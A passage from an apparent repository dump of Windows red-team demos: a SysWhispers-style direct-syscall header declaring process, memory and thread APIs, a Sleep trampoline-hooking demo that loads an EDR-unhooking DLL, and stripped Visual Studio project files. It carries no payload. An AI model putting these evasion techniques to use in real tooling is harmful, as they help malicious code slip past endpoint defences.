_SW3_SYSCALL_ENTRY\r\n{\r\n\tDWORD Hash;\r\n\tDWORD Address;\r\n\tPVOID SyscallAddress;\r\n} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;\r\n\r\ntypedef struct _SW3_SYSCALL_LIST\r\n{\r\n\tDWORD Count;\r\n\tSW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];\r\n} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;\r\n\r\ntypedef struct _SW3_PEB_LDR_DATA {\r\n\tBYTE Reserved1[8];\r\n\tPVOID Reserved2[3];\r\n\tLIST_ENTRY InMemoryOrderModuleList;\r\n} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;\r\n\r\ntypedef struct _SW3_LDR_DATA_TABLE_ENTRY {\r\n\tPVOID Reserved1[2];\r\n\tLIST_ENTRY InMemoryOrderLinks;\r\n\tPVOID Reserved2[2];\r\n\tPVOID DllBase;\r\n} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _SW3_PEB {\r\n\tBYTE Reserved1[2];\r\n\tBYTE BeingDebugged;\r\n\tBYTE Reserved2[1];\r\n\tPVOID Reserved3[2];\r\n\tPSW3_PEB_LDR_DATA Ldr;\r\n} SW3_PEB, * PSW3_PEB;\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName);\r\nBOOL SW3_PopulateSyscallList();\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID);\r\ntypedef struct _SYSTEM_HANDLE\r\n{\r\n\tULONG ProcessId;\r\n\tBYTE ObjectTypeNumber;\r\n\tBYTE Flags;\r\n\tUSHORT Handle;\r\n\tPVOID Object;\r\n\tACCESS_MASK GrantedAccess;\r\n} SYSTEM_HANDLE, * PSYSTEM_HANDLE;\r\n\r\ntypedef struct _IO_STATUS_BLOCK\r\n{\r\n\tunion\r\n\t{\r\n\t\tNTSTATUS Status;\r\n\t\tVOID* Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION\r\n{\r\n\tULONG HandleCount;\r\n\tSYSTEM_HANDLE Handles[1];\r\n} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef VOID(KNORMAL_ROUTINE) (\r\n\tIN PVOID NormalContext,\r\n\tIN PVOID SystemArgument1,\r\n\tIN PVOID SystemArgument2);\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * PPS_ATTRIBUTE;\r\n\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\n#ifndef InitializeObjectAttributes\r\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\r\n\t(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \\\r\n\t(p)->RootDirectory = r; \\\r\n\t(p)->Attributes = a; \\\r\n\t(p)->ObjectName = n; \\\r\n\t(p)->SecurityDescriptor = s; \\\r\n\t(p)->SecurityQualityOfService = NULL; \\\r\n}\r\n#endif\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG Length;\r\n\tHANDLE RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG Attributes;\r\n\tPVOID SecurityDescriptor;\r\n\tPVOID SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * PCLIENT_ID;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation = 0,\r\n\tSystemPerformanceInformation = 2,\r\n\tSystemTimeOfDayInformation = 3,\r\n\tSystemProcessInformation = 5,\r\n\tSystemProcessorPerformanceInformation = 8,\r\n\tSystemHandleInformation = 16,\r\n\tSystemInterruptInformation = 23,\r\n\tSystemExceptionInformation = 33,\r\n\tSystemRegistryQuotaInformation = 37,\r\n\tSystemLookasideInformation = 45,\r\n\tSystemCodeIntegrityInformation = 103,\r\n\tSystemPolicyInformation = 134,\r\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef enum _PROCESSINFOCLASS\r\n{\r\n\tProcessBasicInformation = 0,\r\n\tProcessDebugPort = 7,\r\n\tProcessWow64Information = 26,\r\n\tProcessImageFileName = 27,\r\n\tProcessBreakOnTermination = 29\r\n} PROCESSINFOCLASS, * PPROCESSINFOCLASS;\r\n\r\ntypedef enum _WAIT_TYPE\r\n{\r\n\tWaitAll = 0,\r\n\tWaitAny = 1\r\n} WAIT_TYPE, * PWAIT_TYPE;\r\n\r\ntypedef VOID(NTAPI* PIO_APC_ROUTINE) (\r\n\tIN PVOID ApcContext,\r\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG Reserved);\r\n\r\ntypedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;\r\n\r\ntypedef enum _THREADINFOCLASS\r\n{\r\n\tThreadBasicInformation,\r\n\tThreadTimes,\r\n\tThreadPriority,\r\n\tThreadBasePriority,\r\n\tThreadAffinityMask,\r\n\tThreadImpersonationToken,\r\n\tThreadDescriptorTableEntry,\r\n\tThreadEnableAlignmentFaultFixup,\r\n\tThreadEventPair_Reusable,\r\n\tThreadQuerySetWin32StartAddress,\r\n\tThreadZeroTlsCell,\r\n\tThreadPerformanceCount,\r\n\tThreadAmILastThread,\r\n\tThreadIdealProcessor,\r\n\tThreadPriorityBoost,\r\n\tThreadSetTlsArrayAddress,\r\n\tThreadIsIoPending,\r\n\tThreadHideFromDebugger,\r\n\tThreadBreakOnTermination,\r\n\tMaxThreadInfoClass\r\n} THREADINFOCLASS, * PTHREADINFOCLASS;\r\n\r\ntypedef enum _SECTION_INHERIT\r\n{\r\n\tViewShare = 1,\r\n\tViewUnmap = 2\r\n} SECTION_INHERIT, * PSECTION_INHERIT;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS\r\n{\r\n\tFileDirectoryInformation = 1,\r\n\tFileFullDirectoryInformation = 2,\r\n\tFileBothDirectoryInformation = 3,\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFileInternalInformation = 6,\r\n\tFileEaInformation = 7,\r\n\tFileAccessInformation = 8,\r\n\tFileNameInformation = 9,\r\n\tFileRenameInformation = 10,\r\n\tFileLinkInformation = 11,\r\n\tFileNamesInformation = 12,\r\n\tFileDispositionInformation = 13,\r\n\tFilePositionInformation = 14,\r\n\tFileFullEaInformation = 15,\r\n\tFileModeInformation = 16,\r\n\tFileAlignmentInformation = 17,\r\n\tFileAllInformation = 18,\r\n\tFileAllocationInformation = 19,\r\n\tFileEndOfFileInformation = 20,\r\n\tFileAlternateNameInformation = 21,\r\n\tFileStreamInformation = 22,\r\n\tFilePipeInformation = 23,\r\n\tFilePipeLocalInformation = 24,\r\n\tFilePipeRemoteInformation = 25,\r\n\tFileMailslotQueryInformation = 26,\r\n\tFileMailslotSetInformation = 27,\r\n\tFileCompressionInformation = 28,\r\n\tFileObjectIdInformation = 29,\r\n\tFileCompletionInformation = 30,\r\n\tFileMoveClusterInformation = 31,\r\n\tFileQuotaInformation = 32,\r\n\tFileReparsePointInformation = 33,\r\n\tFileNetworkOpenInformation = 34,\r\n\tFileAttributeTagInformation = 35,\r\n\tFileTrackingInformation = 36,\r\n\tFileIdBothDirectoryInformation = 37,\r\n\tFileIdFullDirectoryInformation = 38,\r\n\tFileValidDataLengthInformation = 39,\r\n\tFileShortNameInformation = 40,\r\n\tFileIoCompletionNotificationInformation = 41,\r\n\tFileIoStatusBlockRangeInformation = 42,\r\n\tFileIoPriorityHintInformation = 43,\r\n\tFileSfioReserveInformation = 44,\r\n\tFileSfioVolumeInformation = 45,\r\n\tFileHardLinkInformation = 46,\r\n\tFileProcessIdsUsingFileInformation = 47,\r\n\tFileNormalizedNameInformation = 48,\r\n\tFileNetworkPhysicalNameInformation = 49,\r\n\tFileIdGlobalTxDirectoryInformation = 50,\r\n\tFileIsRemoteDeviceInformation = 51,\r\n\tFileUnusedInformation = 52,\r\n\tFileNumaNodeInformation = 53,\r\n\tFileStandardLinkInformation = 54,\r\n\tFileRemoteProtocolInformation = 55,\r\n\tFileRenameInformationBypassAccessCheck = 56,\r\n\tFileLinkInformationBypassAccessCheck = 57,\r\n\tFileVolumeNameInformation = 58,\r\n\tFileIdInformation = 59,\r\n\tFileIdExtdDirectoryInformation = 60,\r\n\tFileReplaceCompletionInformation = 61,\r\n\tFileHardLinkFullIdInformation = 62,\r\n\tFileIdExtdBothDirectoryInformation = 63,\r\n\tFileDispositionInformationEx = 64,\r\n\tFileRenameInformationEx = 65,\r\n\tFileRenameInformationExBypassAccessCheck = 66,\r\n\tFileMaximumInformation = 67,\r\n} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\nEXTERN_C NTSTATUS NtCreateProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN BOOLEAN InheritObjectTable,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateThreadEx(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID Argument OPTIONAL,\r\n\tIN ULONG CreateFlags,\r\n\tIN SIZE_T ZeroBits,\r\n\tIN SIZE_T StackSize,\r\n\tIN SIZE_T MaximumStackSize,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessToken(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtTestAlert();\r\n\r\nEXTERN_C NTSTATUS NtOpenThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSuspendProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtSuspendThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG PreviousSuspendCount);\r\n\r\nEXTERN_C NTSTATUS NtResumeProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PULONG PreviousSuspendCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PCONTEXT ThreadContext);\r\n\r\nEXTERN_C NTSTATUS NtSetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PCONTEXT Context);\r\n\r\nEXTERN_C NTSTATUS NtClose(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtReadVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tOUT PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tOUT PSIZE_T NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T NumberOfBytesToWrite,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect);\r\n\r\nEXTERN_C NTSTATUS NtProtectVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG NewProtect,\r\n\tOUT PULONG OldProtect);\r\n\r\nEXTERN_C NTSTATUS NtFreeVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG FreeType);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN OUT PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PUNICODE_STRING FileName OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tOUT PVOID ProcessInformation,\r\n\tIN ULONG ProcessInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN SIZE_T CommitSize,\r\n\tIN OUT PLARGE_INTEGER SectionOffset OPTIONAL,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN SECTION_INHERIT InheritDisposition,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Win32Protect);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSection(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress);\r\n\r\nEXTERN_C NTSTATUS NtAdjustPrivilegesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN DisableAllPrivileges,\r\n\tIN PTOKEN_PRIVILEGES NewState OPTIONAL,\r\n\tIN ULONG BufferLength,\r\n\tOUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeviceIoControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG IoControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects(\r\n\tIN ULONG Count,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\n#endif\r\n" }, { "path": "demo5/syscall3/syscall3/syscall3.cpp", "content": "#include \r\n#include \"1.h\"\r\n\r\nint main()\r\n{\r\n NtTestAlert();\r\n\r\n //std::cout << \"Hello World!\\n\";\r\n}" }, { "path": "demo5/syscall3/syscall3/syscall3.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n Win32Proj\r\n {7504426e-c438-432a-8e89-ae02608b2055}\r\n syscall3\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Document\r\n true\r\n true\r\n \r\n \r\n 3\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo5/syscall3/syscall3/syscall3.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n 源文件\r\n \r\n \r\n 源文件\r\n \r\n \r\n \r\n \r\n 头文件\r\n \r\n \r\n \r\n \r\n 源文件\r\n \r\n \r\n" }, { "path": "demo5/syscall3/syscall3/syscall3.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "demo5/syscall3/syscall3.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"syscall3\", \"syscall3\\syscall3.vcxproj\", \"{7504426E-C438-432A-8E89-AE02608B2055}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x64.Build.0 = Release|x64\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{7504426E-C438-432A-8E89-AE02608B2055}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {82B009C0-3F9F-4740-A7B3-B4F1FA9BB428}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "demo6/unhook_demo/Header.h", "content": "#pragma once\r\n#include \n#include \n#include \n#include \n#include \r\n\r\ntypedef void (WINAPI* typeSleep)(\n\tDWORD dwMilis\n\t);\r\n\r\ntypedef DWORD(NTAPI* typeNtFlushInstructionCache)(\n\tHANDLE ProcessHandle,\n\tPVOID BaseAddress,\n\tULONG NumberOfBytesToFlush\n\t);\r\n\r\ntypedef std::unique_ptr::type, decltype(&::CloseHandle)> HandlePtr;\n\nstruct HookedSleep\n{\n\ttypeSleep origSleep;\n\tBYTE sleepStub[16];\n};\r\n\r\nstruct HookTrampolineBuffers\n{\n\t// (Input) Buffer containing bytes that should be restored while unhooking.\n\tBYTE* originalBytes;\n\tDWORD originalBytesSize;\n\n\t// (Output) Buffer that will receive bytes present prior to trampoline installation/restoring.\n\tBYTE* previousBytes;\n\tDWORD previousBytesSize;\n};\n\r\n\r\nvoid WINAPI MySleep(DWORD _dwMilliseconds);" }, { "path": "demo6/unhook_demo/unhook_demo.cpp", "content": "// unhook_demo.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include \r\n#include \r\n#include \"Header.h\"\r\n\r\nusing namespace std;\r\n\r\nHookedSleep g_hookedSleep;\r\n\r\nvoid WINAPI MySleep(DWORD dwMilliseconds)\n{\n\t//\n\t// Locate this stack frame's return address.\n\t// \n\t//MessageBoxA(0,\"whoami\",NULL, NULL);\n\n\tcout << \"hooked sleep executed\" << endl;\n}\r\n\r\n\r\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)\n{\n#ifdef _WIN64\n\tuint8_t trampoline[] = {\n\t\t0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr\n\t\t0x41, 0xFF, 0xE2 // jmp r10\n\t};\n\n\tuint64_t addr = (uint64_t)(jumpAddress);\n\tmemcpy(&trampoline[2], &addr, sizeof(addr));\n#else\n\tuint8_t trampoline[] = {\n\t\t0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, addr\n\t\t0xFF, 0xE0 // jmp eax\n\t};\n\n\tuint32_t addr = (uint32_t)(jumpAddress);\n\tmemcpy(&trampoline[1], &addr, sizeof(addr));\n#endif\n\n\tDWORD dwSize = sizeof(trampoline);\n\tDWORD oldProt = 0;\n\tbool output = false;\n\n\tif (installHook)\n\t{\n\t\tif (buffers != NULL)\n\t\t{\n\t\t\tif (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0)\n\t\t\t\treturn false;\n\n\t\t\tmemcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize);\n\t\t}\n\n\t\tif (::VirtualProtect(\n\t\t\taddressToHook,\n\t\t\tdwSize,\n\t\t\tPAGE_EXECUTE_READWRITE,\n\t\t\t&oldProt\n\t\t))\n\t\t{\n\t\t\tmemcpy(addressToHook, trampoline, dwSize);\n\t\t\toutput = true;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (buffers == NULL)\n\t\t\treturn false;\n\n\t\tif (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0)\n\t\t\treturn false;\n\n\t\tdwSize = buffers->originalBytesSize;\n\n\t\tif (::VirtualProtect(\n\t\t\taddressToHook,\n\t\t\tdwSize,\n\t\t\tPAGE_EXECUTE_READWRITE,\n\t\t\t&oldProt\n\t\t))\n\t\t{\n\t\t\tmemcpy(addressToHook, buffers->originalBytes, dwSize);\n\t\t\toutput = true;\n\t\t}\n\t}\n\n\tstatic typeNtFlushInstructionCache pNtFlushInstructionCache = NULL;\n\tif (!pNtFlushInstructionCache)\n\t\tpNtFlushInstructionCache = (typeNtFlushInstructionCache)\n\t\tGetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtFlushInstructionCache\");\n\n\t//\n\t// We're flushing instructions cache just in case our hook didn't kick in immediately.\n\t//\n\tif (pNtFlushInstructionCache)\n\t\tpNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize);\n\n\t::VirtualProtect(\n\t\taddressToHook,\n\t\tdwSize,\n\t\toldProt,\n\t\t&oldProt\n\t);\n\n\treturn output;\n}\n\nbool hookSleep()\n{\n\tHookTrampolineBuffers buffers = { 0 };\n\tbuffers.previousBytes = g_hookedSleep.sleepStub;\n\tbuffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n\tg_hookedSleep.origSleep = reinterpret_cast(Sleep);\n\n\tif (!fastTrampoline(true, (BYTE*)::Sleep, (void*)& MySleep, &buffers))\n\t\treturn false;\n\n\treturn true;\n}\r\n\r\nint main()\r\n{\r\n\thookSleep();\r\n\tSleep(5000);\r\n\t#define FROM_DISK == 1\n\tHMODULE hwhand = LoadLibraryA(\"RefleXXion-DLL.dll\");\r\n\tSleep(5000);\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n// 1. Use the Solution Explorer window to add/manage files\r\n// 2. Use the Team Explorer window to connect to source control\r\n// 3. Use the Output window to see build output and other messages\r\n// 4. Use the Error List window to view errors\r\n// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n" }, { "path": "demo6/unhook_demo/unhook_demo.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n {D7F4E23F-325F-4C05-9FD9-5FE851B1A34D}\r\n Win32Proj\r\n unhookdemo\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v142\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v142\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v142\r\n Unicode\r\n \r\n \r\n 